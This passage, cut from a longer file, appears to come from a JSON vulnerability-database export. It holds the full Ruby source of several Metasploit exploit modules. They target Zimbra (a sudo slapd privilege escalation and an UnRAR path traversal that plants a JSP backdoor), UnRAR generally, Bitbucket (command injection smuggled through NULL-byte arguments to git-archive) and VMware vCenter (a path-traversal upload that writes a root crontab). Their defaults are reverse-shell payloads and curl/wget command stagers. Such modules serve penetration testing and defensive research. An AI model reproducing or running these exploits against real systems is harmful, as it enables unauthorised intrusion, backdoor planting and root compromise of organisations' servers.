config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/zimbra_slapper_priv_esc.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. 
This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-27T19:45:47", "type": "metasploit", "title": "UnRAR Path Traversal in Zimbra (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-12-06T14:07:28", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 
'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', 
[ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n 
end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Sanity check - the file shouldn't exist, but we should be able to do requests to the server\n if datastore['TRIGGER_PAYLOAD']\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::Unknown, 'Could not determine the public web path')\n end\n\n print_status('Checking the HTTP connection to the target')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')\n end\n\n # Break when the file successfully appears\n unless res.code == 404\n fail_with(Failure::Unknown, \"Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}\")\n end\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! 
Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n\n # We flip this once we trigger the payload\n keep_sending = true\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n # Once we've triggered the payload, stop trying to\n if keep_sending\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n # Break when the file successfully appears\n if res.code == 200\n print_good('Successfully triggered the payload')\n keep_sending = false\n next\n end\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRAR'ed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. 
If a second file in the archive has the same name, it will be written to the symbolic link path.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T21:05:15", "type": "metasploit", "title": "UnRAR Path Traversal (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-22T18:46:50", "id": "MSF:EXPLOIT-LINUX-FILEFORMAT-UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/fileformat/unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that exploits CVE-2022-30333, which is a\n path-traversal vulnerability in unRAR that can extract an 
arbitrary file\n to an arbitrary location on a Linux system. UnRAR fixed this\n vulnerability in version 6.12 (open source version 6.1.7).\n\n The core issue is that when a symbolic link is unRAR'ed, Windows\n symbolic links are not properly validated on Linux systems and can\n therefore write a symbolic link that points anywhere on the filesystem.\n If a second file in the archive has the same name, it will be written\n to the symbolic link path.\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Generic RAR file', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\" - as well as a filename).']),\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)'])\n ]\n )\n end\n\n def exploit\n print_status(\"Target filename: #{datastore['TARGET_PATH']}\")\n\n if datastore['CUSTOM_PAYLOAD'].present?\n print_status(\"Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}\")\n payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])\n\n # 
Append a newline + NUL byte, since random data will be appended and we\n # don't want to break shellscripts\n payload_data.concat(\"\\n\\0\")\n else\n print_status('Encoding configured payload')\n payload_data = generate_payload_exe\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload_data)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-03T06:44:19", "description": "Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint creates an archive of the repository, leveraging the `git-archive` command to do so. 
Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.\n", "cvss3": {}, "published": "2022-09-19T22:28:17", "type": "metasploit", "title": "Bitbucket Git Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-01T07:54:59", "id": "MSF:EXPLOIT-LINUX-HTTP-BITBUCKET_GIT_CMD_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/bitbucket_git_cmd_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Bitbucket Git Command Injection',\n 'Description' => %q{\n Various versions of Bitbucket Server and Data Center are vulnerable to\n an unauthenticated command injection vulnerability in multiple API endpoints.\n\n The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint\n creates an archive of the repository, leveraging the `git-archive` command to do so.\n Supplying NULL bytes to the request enables the passing of additional arguments to the\n command, ultimately enabling execution of arbitrary commands.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'TheGrandPew', # discovery\n 'Ron Bowes', # analysis and PoC\n 'Jang', # testanull - PoC\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'URL', 'https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/' ],\n [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],\n [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],\n 
[ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],\n [ 'CVE', '2022-36804' ]\n ],\n 'Platform' => [ 'linux' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Type' => :linux_dropper,\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => %w[wget curl bourne],\n 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Type' => :unix_cmd,\n 'Arch' => ARCH_CMD,\n 'Payload' => { 'BadChars' => %(:/?#[]@) },\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }\n }\n ]\n ],\n 'DisclosureDate' => '2022-08-24',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7990),\n OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),\n OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),\n OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'keep_cookies' => true,\n 'uri' => normalize_uri(target_uri.path, 'login')\n )\n\n return CheckCode::Unknown('Failed to receive response from application') unless res\n\n unless res.body.include?('Bitbucket')\n return CheckCode::Safe('Target does not appear to be Bitbucket')\n end\n\n footer = res.get_html_document&.at('footer')\n return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer\n\n version_str = footer.at('span')&.children&.text\n return CheckCode::Detected('Cannot find version string in footer') unless version_str\n\n matches = version_str.match(/v(\\d+\\.\\d+\\.\\d+)/)\n return CheckCode::Detected('Version unknown') unless 
matches && matches.length > 1\n\n version_str = matches[1]\n vprint_status(\"Found Bitbucket version: #{matches[1]}\")\n\n num_vers = Rex::Version.new(version_str)\n return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')\n\n major, minor, revision = version_str.split('.')\n case major\n when '6'\n return CheckCode::Appears\n when '7'\n case minor\n when '6'\n return CheckCode::Appears if revision.to_i < 17\n when '17'\n return CheckCode::Appears if revision.to_i < 10\n when '21'\n return CheckCode::Appears if revision.to_i < 4\n end\n when '8'\n case minor\n when '0', '1'\n return CheckCode::Appears if revision.to_i < 3\n when '2'\n return CheckCode::Appears if revision.to_i < 2\n when '3'\n return CheckCode::Appears if revision.to_i < 1\n end\n end\n\n CheckCode::Detected\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def authenticate\n print_status(\"Attempting to authenticate with user '#{username}' and password '#{password}'\")\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'j_username' => username,\n 'j_password' => password,\n 'submit' => 'Log in'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'dashboard'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res\n\n unless res.body.include?('Your work') && res.body.include?('Projects')\n fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')\n 
end\n\n @authenticated = true\n print_good('Successfully logged into Bitbucket!')\n end\n\n def find_public_repo\n print_status('Searching Bitbucket for publicly accessible repository')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),\n 'keep_cookies' => true\n )\n\n fail_with(Failure::Disconnected, 'Did not receive a response') unless res\n json_data = JSON.parse(res.body)\n fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data\n\n unless json_data['size'] > 0\n fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')\n end\n\n # opt for public repos unless none exist.\n # Attempt to use a private repo if so\n repos = json_data['values']\n possible_repos = repos.select { |repo| repo['public'] == true }\n if possible_repos.empty? && @authenticated\n possible_repos = repos.select { |repo| repo['public'] == false }\n end\n\n fail_with(Failure::NotFound, 'There doesn\\'t appear to be any repos to use') if possible_repos.empty?\n possible_repos.each do |repo|\n project = repo['project']\n next unless project\n\n @project = project['key']\n @repo = repo['slug']\n break if @project && @repo\n end\n\n fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo\n print_good(\"Found public repo '#{@repo}' in project '#{@project}'!\")\n end\n\n def execute_command(cmd, _opts = {})\n uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'keep_cookies' => true,\n 'vars_get' =>\n {\n 'format' => 'zip',\n 'path' => Rex::Text.rand_text_alpha(2..5),\n 'prefix' => \"#{Rex::Text.rand_text_alpha(1..3)}\\x00--exec=`#{cmd}`\\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}\"\n }\n )\n end\n\n def exploit\n @authenticated = false\n authenticate unless username.blank? 
&& password.blank?\n find_public_repo\n\n if target['Type'] == :linux_dropper\n execute_cmdstager(linemax: 6000)\n else\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/bitbucket_git_cmd_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. 
CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n 
unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-03T15:23:32", "description": "This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. 
If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on the following versions of Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) Note that the Open Source Edition is not affected.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-23T16:43:51", "type": "metasploit", "title": "Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 